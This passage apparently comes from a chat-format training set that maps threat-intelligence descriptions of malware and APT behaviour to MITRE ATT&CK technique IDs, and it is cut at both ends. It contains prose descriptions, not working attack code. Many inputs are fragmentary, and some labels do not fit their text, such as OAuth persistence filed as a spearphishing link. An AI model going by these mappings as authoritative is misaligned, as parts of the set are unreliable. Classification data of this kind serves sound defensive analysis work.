Establish Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 server sends back Base64 encoded response" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover Group Policy details using the \"gpresult\" command." }, { "role": "assistant", "content": "T1615 - Group Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito can launch PowerShell Scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind obtains the victim IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie uses RC4 and Base64 to obfuscate strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains the victim IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains base64-encoded strings." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors have used and a modified version of called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "may create a file containing the results of the command cmd.exe /c net user {Username}." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, threat actors ran \"sc start\" to start the COMSysApp as part of the service hijacking and \"sc stop\" to stop and reconfigure the COMSysApp." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has used spearphishing emails with malicious attachments to initially compromise victims." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has used web shells to export mailbox data." }, { "role": "assistant", "content": "T1114.002 - Email Collection: Remote Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used PowerShell to add and delete rules in the Windows firewall." }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali has used embedded VBScript to download malicious payloads from C2." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used VBS scripts throughout its operations." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has sent system information to its C2 server using HTTP." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, stolen data was copied into a text file using the format `From (- --).txt` prior to compression, encoding, and exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API)." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It continues to perform a number of checks for installed security products on the victim machine. The following security platforms are queried by checking entries within the HKLM\\Software\\ registry path" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WINDSHIELD C2 traffic can communicate via TCP raw sockets." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has automatically collected mouse clicks, continuous screenshots on the machine, and set timers to collect the contents of the clipboard and website browsing." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used e-mail attachments to lure victims into executing malicious code." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Javali has achieved execution through victims clicking links to malicious websites." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used the SNScan tool to find other potential targets on victim networks." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Helminth can provide a remote shell. One version of Helminth uses batch scripting." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity: Support Help elie WADGUtilityAccount" }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account', 'T1136.002 - Create Account: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "More_eggs has the capability to gather the OS version and computer name." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "variants have communicated with C2 servers over HTTP and HTTPS." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can execute \"getinfo\" to identify the username on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has the ability to hide and unhide files." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Executes VBScript using Process.Start. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Drops AdvancedRun.exe using File.WriteAllBytes. AdvancedRun.exe\" is a tool provided by Nirsoft to execute a program with different settings. Once the tool is dropped, the third stage DLL will leverage it to execute two commands in the context of the Windows TrustedInstaller group. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files. AdvanceRun is one of the tools that can be used to execute commands in the context of the TrustedInstaller user. This functionality is only available via CLI and requires the flag of \"/RunAs 8\", which is shown in the commands below. The tool will be deleted from the %TEMP% directory after executing both commands. The first command leverages the Windows service control application (sc.exe) to disable Windows Defender" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1078.001 - Valid Accounts: Default Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IRON TWILIGHT’s email credential targeting system allows the threat group to target and exploit accounts for webmail services such as Gmail and Hotmail, as well as corporate email platforms that use webmail interfaces. When targeting email services that provide alternate methods to authenticate account access, such as Gmail’s use of OAuth, the threat actors may abuse this feature to maintain a persistent session with the compromised account" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT10 has targeted or compromised manufacturing companies in India, Japan and Northern Europe; a mining company in South America; and multiple IT service providers worldwide. Traditional and Novel Methods . This recent APT10 activity has included both traditional spear phishing and access to victim’s networks through service providers. In addition to the spear phishes, FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers. Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider’s customer. In addition, web traffic between a service provider’s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily. A notable instance of this observed by FireEye involved a SOGU backdoor that was set to communicate with its C2 through a server belonging to the victim’s service provider. The actor then tested connectivity to an IP managed by the victim’s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim’s SOGU backdoor. This effectively routes SOGU malware traffic through the victim’s service provider, which likely indicates a foothold on the service provider’s network. Their abuse of access to service provider networks demonstrates that peripheral organizations continue to be of interest to a malicious actor – especially those seeking alternative angles of attack" }, { "role": "assistant", "content": "T1199 - Trusted Relationship" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can migrate the loader into another process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After this information is obtained, the attacker can generate and send a specially crafted HTTP POST request to the Exchange server with an XML SOAP payload to the Exchange Web Services (EWS) API endpoint" }, { "role": "assistant", "content": "T1590 - Gather Victim Network Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa has the ability to record audio." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has the ability to identify the username on a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to discover and manipulate Windows services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kessel's configuration is hardcoded and RC4 encrypted within the binary." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has deleted Registry keys during post compromise cleanup activities." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro has used malicious links to gain execution on victim machines." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a Registry subkey that registers a new service." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM established persistence for PoisonIvy by created a scheduled task." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can access the \"HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData\" Registry key to obtain the System manufacturer value to identify the machine type." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PipeMon can inject its modules into various processes using reflective DLL loading." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet attempts to access network resources with a domain account’s credentials." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShell Cobalt Strike Beacon - New payload + new C2 domain - PowerShell Obfuscator - All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon’s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper - A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper - Inspired by known Outlook credentials dumpers" }, { "role": "assistant", "content": "T1552.002 - Unsecured Credentials: Credentials in Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RunningRAT captures keystrokes and sends them back to the C2 server." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used \"time /t\" and \"net time \\\\ip/hostname\" for system time discovery." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can set persistence with a Registry run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "8 Upload the TPX498.dat file, which contains the list of collected keystrokes" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is installed via execution of rundll32 with an export named \"init\" or \"InitW.\"" }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can decrypt strings using the victim's hostname as the key." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a suspended svchost process and injects its DLL into it." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SOUNDBITE is capable of enumerating application windows." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wiarp creates a backdoor through which remote attackers can open a command line interface." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used environment variable string substitution for obfuscation." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VBShower has the ability to download VBS files to the target computer." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This PowerShell backdoor was observed to be related to the SystemBC malware as a service. The script has a hard coded C&C server IP address and port number to connect to, with data passed to the “Rc4_crypt” function before connection." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "queries several Registry keys to identify hard disk partitions to overwrite." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the deletion process, the malware gets the function “Wow64RevertWow64FsRedirection” using the function “GetProcAddress” and calls it in a dynamic way to leave the system in the same state as before" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs data exfiltration over the control server channel using a custom protocol." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We have covered recent FIN7 activity in previous public blog posts: FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings FIN7 Evolution and the Phishing LNK To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "“Knock” also appears in several strings inside the code of SpeakUp" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed can use \"GetKeyState\" and \"GetKeyboardState\" to capture keystrokes on the victim’s machine." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In another update, the P8RAT sample from August 2020 looks for two process names (“VBoxService.exe” and “vmtoolsd.exe”) on the victim’s system, to detect VMware or VirtualBox environments at the beginning of its main malicious function" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Next, the third-stage DLL will load the \"Waqybg\" resource into memory. As the resource is stored in reverse byte order, the third-stage DLL will restore it by reversing the bytes and then proceed to decompress it. The decompressed data is the fourth stage wiper payload. After decompressing the data, the third-stage DLL copies a legitimate Windows utility \"InstallUtil.exe\" into the %TEMP% directory, creates a suspended process with it and injects the fourth-stage 